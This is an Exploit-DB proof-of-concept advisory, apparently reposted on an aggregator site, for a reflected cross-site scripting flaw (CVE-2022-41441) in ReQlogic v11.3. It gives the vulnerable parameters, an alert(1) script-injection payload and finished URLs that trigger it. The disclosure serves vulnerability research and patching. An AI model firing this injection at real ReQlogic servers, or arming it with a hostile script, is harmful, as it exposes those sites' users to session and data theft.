ReQlogic v11.3 – Reflected Cross-Site Scripting (XSS)

  • 作者: Okan Kurtulus
    日期: 2023-03-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51118/
  • # Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)
    # Date: 9 October 2022
    # Exploit Author: Okan Kurtulus
    # Vendor Homepage: https://reqlogic.com
    # Version: 11.3
    # Tested on: Linux
    # CVE : 2022-41441
    
    # Proof of Concept:
    1- Install ReQlogic v11.3
    2- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=3
    3- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.
    
    #XSS Payload:
    </script><script>alert(1)</script>
    
    #Affected Prameters
    POBatch
    WaitDuration
    
    #Final URLs
    http://localost:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3
    http://localost:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>